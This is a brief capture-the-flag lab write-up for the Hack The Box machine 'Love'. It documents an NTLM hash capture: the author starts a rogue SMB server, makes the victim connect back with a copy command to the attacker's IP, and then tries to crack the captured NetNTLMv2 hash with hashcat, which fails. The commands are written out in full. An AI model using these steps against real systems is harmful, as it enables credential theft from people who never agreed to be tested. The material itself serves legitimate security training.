InfoSec LAB

Love_NTLM_Relay

Created: 2 min read

NTLM Relay

Upon gaining a foothold, I realized that the current session is made with privileges of the phoebe user Additionally, OutboundRestrictions is not SET for the current system I will attempt to perform a NTLM relay attack to retrieve the current user’s password hash

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ simplesmb .                   
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Starting a local SMB server on Kali

c:\tmp> copy \\10.10.14.17\share\blah
The system cannot find the path specified.

Connecting

NTLM hash retrieved

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ hashcat --show phoebe.hash
 
5600 | NetNTLMv2 | Network Protocol
 
┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ hashcat -a 0 -m 5600 phoebe.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
session..........: hashcat                                
status...........: Exhausted
hash.mode........: 5600 (NetNTLMv2)
hash.target......: PHOEBE::LOVE:aaaaaaaaaaaaaaaa:19f157be18ee6533fcf75...000000
time.started.....: Sat Sep 16 16:58:52 2023 (6 secs)
time.estimated...: Sat Sep 16 16:58:58 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:  2485.5 kH/s (0.79ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
progress.........: 14344385/14344385 (100.00%)
rejected.........: 0/14344385 (0.00%)
restore.point....: 14344385/14344385 (100.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
hardware.mon.#1..: Util: 62%
 
started: Sat Sep 16 16:58:51 2023
stopped: Sat Sep 16 16:58:59 2023

hashcat was unable to crack the password hash

Interactive Graph View

Backlinks